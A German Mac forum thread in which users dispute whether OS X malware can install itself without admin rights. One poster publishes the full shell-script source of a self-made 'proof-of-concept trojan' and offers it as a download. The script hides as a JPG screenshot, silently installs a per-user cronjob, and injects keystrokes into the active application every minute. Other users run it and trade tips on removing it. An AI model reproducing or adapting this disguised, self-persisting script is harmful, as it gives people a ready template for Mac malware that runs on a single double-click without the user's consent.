Trojaner, Wurm entdeckt

wenn hier jemand erzaehlt, auf seinem Balkon spazieren kleine gruene Maennchen rum die mit Glibber werfen wuerde ich auch erst mal nach einem Foto fragen. Wenn ich keins bekomme - schlecht aufloesendes Mobiltelefon Picture wuerde durchaus fuers erste reichen - dann wuerde ich mit die Freiheit nehmen meine Zweifel deutlich zu machen.
 
Gibt es übrigens irgendwelche Neuigkeiten über diesen "Virus"?

Mein Senf dazu:
Ein Schädling, der sich so verhält, wie vom Thread-Ersteller beschrieben, liesse sich von jedem Feld-Wald-und-Wiesen-Programmierer herstellen. Man nehme ein getarntes Shellscript, welches auf Doppelklick einen Cronjob installiert und in regelmässigen Abständen ein Applescript startet, welches seinerseits Müll in offene Applikationen schreibt - kein wirklicher Virus natürlich, aber ein falscher Klick reicht und das System ist ausser Rand und Band. Und hierfür wären weder eine Passworteingabe noch Admin-Rechte nötig.

Kein Grund also, sich lustig zu machen, bloss weil da im ausgegebenen Text zufällig (oder aus Blödsinn, was weiss ich) ".exe" steht...
 
naja, erstens sind das jetzt periodic skripte (keine cron), und wie du in /etc/periodic (da liegen die nämlich) ohne admin pwd (selbst wenn du als admin unterwegs bist!!) schreiben willst versteh ich auch nicht
 
Zuletzt bearbeitet:
Genau das wuerde mich auch interessieren :)
 
minilux schrieb:
naja, erstens sind das jetzt periodic skripte (keine cron), und wie du in /etc/periodic (da liegen die nämlich) ohne admin pwd (selbst wenn du als admin unterwegs bist!!) schreiben willst versteh ich auch nicht
Zum Vergrößern anklicken....
Periodic-Skripte kenne ich nicht, aber zum einen gibt es Cron unter OS X sehr wohl (oder habe ich deine Aussage jetzt falsch verstanden?) und zum anderen kann ein Cronjob ohne Admin- oder root-Rechte installiert werden.

Jeder User hat seine eigene Crontab (crontab -e) und ein solches Skript, welches sich nur auf das aktuelle User-Konto auswirkt (und das täte es in diesem Fall) lässt sich da somit problemlos unterbringen.

Edit:
Hier ein Beispiel, wie man das umsetzen könnte:

echo '* * * * * befehle' > .cronjob #unsichtbare Datei für den Cronjob vorbereiten
crontab .cronjob #Cronjob installieren
 
edit: seit 10.4 ist cron da nicht mehr beteiligt. Die Dinger heissen periodic-Skripte und werden vom launchd gestartet.
die Periodic Skripte selber liegen unter /etc/periodic, und da kann man auch als Admin nur nach nochmaliger Authentifizierung reinschreiben -- probiers mal aus ;)
 
minilux schrieb:
edit: seit 10.4 ist cron da nicht mehr beteiligt. Die Dinger heissen periodic-Skripte und werden vom launchd gestartet.
die Periodic Skripte selber liegen unter /etc/periodic, und da kann man auch als Admin nur nach nochmaliger Authentifizierung reinschreiben -- probiers mal aus ;)
Zum Vergrößern anklicken....
Falsch. Cron gibt es in 10.4 noch - nur weil es jetzt zusätzlich launchd gibt, heisst das noch lange nicht, dass cron obsolet ist.

Edit: und dass es mit periodic so nicht geht, spielt deswegen keinerlei Rolle.
Edit2: und JA, bei 10.4 ist cron im System integriert, das muss man nicht selbst installieren


P.S.: Bitte versteht mich richtig, ich habe keinerlei Interesse daran, dass für OS X Schädlinge entstehen (und seien sie auch noch so plump) - aber man sollte den Tatsachen ins Auge sehen: es ist genau gleich einfach, einen Mac zu infizieren, wie bei Windows, wenn man die Unvorsichtigkeit des Users ausnutzt.
 
Zuletzt bearbeitet:
sorry aber mit Verlaub gesagt:
User crontabs differ from the system crontab in that you cannot edit user crontabs directly. For one thing, user crontabs and the directory in which they reside are owned by root, thus are inaccessible to non-root users. The proper way to edit user crontabs is with the crontab utility (not to be confused with the crontab files it creates). Known as a "setuid root program," crontab has had its permissions set so it will always run as root, a functionality that provides you the link to the otherwise restricted locations. The crontab program also checks that your crontab is formatted correctly before installing it as /private/var/cron/tabs/username.
Zum Vergrößern anklicken....
ohne PWD wird auch mit UserCrons nichts gehen ;)
 
Proof-of-Concept

minilux schrieb:
ohne PWD wird auch mit UserCrons nichts gehen ;)
Zum Vergrößern anklicken....
Crontabs können nicht nur mit dem Utility "crontab -e" editiert werden, sondern auch per crontab <cronjob-datei>, wie ich oben geschrieben habe.


Und damit das jetzt nicht in ein ewiges Hin- und Her ausartet, stelle ich im Anhang meinen soeben gebastelten Proof-of-Concept-Trojaner (inkl. Deinstallations-Anleitung) zur Verfügung.

Einfach herunterladen, Archiv auspacken und JPG-Datei doppelklicken. Der Trojaner installiert sich ohne Rückfrage und schreibt fortan jede Minute den Satz "Ich bin ein OS X-Trojaner :)" in ein offenes Fenster.

Wer mutig genug oder von der Kugelsicherheit von OS X ausreichend überzeugt ist, ist herzlich eingeladen, es auszuprobieren :).


Zur Dokumentation hier der Quelltext des Trojaners:


# APPLESCRIPT GENERIEREN
echo "tell application \"System Events\"" > .text_ausgeben
echo " activate" >> .text_ausgeben
# Applikation auswählen
echo " try" >> .text_ausgeben
echo " key down command" >> .text_ausgeben
echo " keystroke tab" >> .text_ausgeben
echo " key down shift" >> .text_ausgeben
echo " keystroke tab" >> .text_ausgeben
echo " key up shift" >> .text_ausgeben
echo " key up command" >> .text_ausgeben
echo " on error" >> .text_ausgeben
echo " key up {control, shift, option, command}" >> .text_ausgeben
echo " end try" >> .text_ausgeben
echo " delay 1" >> .text_ausgeben
# Text schreiben und mit ENTER bestätigen
echo " keystroke \"Hallo, ich bin ein OS X-Trojaner :)\"" >> .text_ausgeben
echo " keystroke return" >> .text_ausgeben
echo "end tell" >> .text_ausgeben

# CRONJOB-DATEI ERSTELLEN
echo '* * * * * /usr/bin/osascript '$PWD'/.text_ausgeben' > .cronjob

# CRONJOB INSTALLIEREN
crontab .cronjob
 
Zuletzt bearbeitet:
das steht da imho aber nicht...?!

zu spät... bezieht sich auf post vorher...
 
cool sheep! man da kann man was lernen... wofür sind die key* befehle über dem mit dem string gut, also im try block?

übrigens hast du die deinstall anleitung vergessen...:)

hm... crontab -r?
dann dateien löschen?
 
daspfanni2000 schrieb:
cool sheep! man da kann man was lernen... wofür sind die key* befehle über dem mit dem string gut, also im try block?
Zum Vergrößern anklicken....
Das ist wahrscheinlich ganz schlechter (Programmier-)Stil, weil ich keine Ahnung von Applescript habe ;). Dieser Teil wählt per Command-Tab und Command-Shift-Tab die aktuelle Applikation aus - ginge sicher eleganter, aber wie gesagt...

übrigens hast du die deinstall anleitung vergessen...:)
Zum Vergrößern anklicken....
Habe ich? Komisch, hab's nochmals hochgeladen, sollte eigentlich drin sein.

hm... crontab -r?
dann dateien löschen?
Zum Vergrößern anklicken....
crontab -e, Zeile löschen und speichern. Die Dateien kann man an sich da lassen, weil sie für sich allein ungefährlich sind - mit Löschen des ausgepackten Ordners "Archive" ist aber alles wieder weg.

P.S.: Beim Deinstallieren solle man etwas pressieren, weil der Trojaner sonst wieder dazwischen funkt ;).
 
Zuletzt bearbeitet:
gutes Beispiel, sheep :thumbsup:

Eines ist klar: dieser Punkt geht an die Fraktion, die dafür plädiert, als normaler User und nicht als Admin zu agieren.

Ein Übervorsichtiger neigt zukünftig vielleicht dazu, fremde Dateien erstmal auf Ausführbarkeit zu prüfen. Das liesse sich zwar im Terminal schnell erledigen mit

Code: 
find . -type f -perm -0111 -print

im verdächtigen Ordner, aber das halte ich für übertrieben, da auch viele harmlose Dateien ausführbar sind.

Also, Augen offen halten, aber entspannt bleiben. ;)
 
äh sorry, ich hab das Teil jetzt mal runtergeladen, auf den "screenshot" doppelgeklickt, Terminal hat sich geöffnet, aber

der Trojaner scheint kaputt zu sein
wo kann ich den umtauschen??

btw: ich bin admin
 
sei froh, dass er nicht funktioniert ;)

einmal, weil nichts bei dir passiert, und zweitens, dass er in dieser Form nicht als Vorlage für Script Kiddies dienen kann. :)

edit: ach, was ich vegessen hatte, zu sagen: unter gewissen Umständen funktioniert er schon :p
 
Zuletzt bearbeitet:
Also das steht bei mir jetzt immer ... aber da wird nix eingegeben ...

Last login: Wed Feb 28 21:49:05 on console
/Users/stefan/Desktop/Archive/screenshot_leopard.command; exit
Welcome to Darwin!
noname:~ stefan$ /Users/stefan/Desktop/Archive/screenshot_leopard.command; exit
logout
[Prozess beendet]

Mehr ned also doch kein Virus ;)
 
ui klappt doch :D Hätte ich jetzt nicht gedacht
 
Mist bei mir klappt die deinstallation nicht :( Und nu ?
 
für alle, die den Trojaner ausprobiert haben, aber sich nicht mit dem Editor vi auskennen.
sheep hatte einen Punkt vergessen, in seiner Anleitung zum deinstallieren.
-> zwischen 4. und 5. einmal auf die die esc-Taste tippen
;)
 
MacMännchen schrieb:
für alle, die den Trojaner ausprobiert haben, aber sich nicht mit dem Editor vi auskennen.
sheep hatte einen Punkt vergessen, in seiner Anleitung zum deinstallieren.
-> zwischen 4. und 5. einmal auf die die esc-Taste tippen
;)
Zum Vergrößern anklicken....

Was heisst das ironie smiley jetzt ??? Jetzt mal spass beiseite ... der Trojaner nervt :)
Danke für den Tip mit ESC ... hat jetzt (glaube ich) geklappt
 
Zuletzt bearbeitet:
Du musst dich einloggen oder registrieren, um hier zu antworten.
Zurück
Oben Unten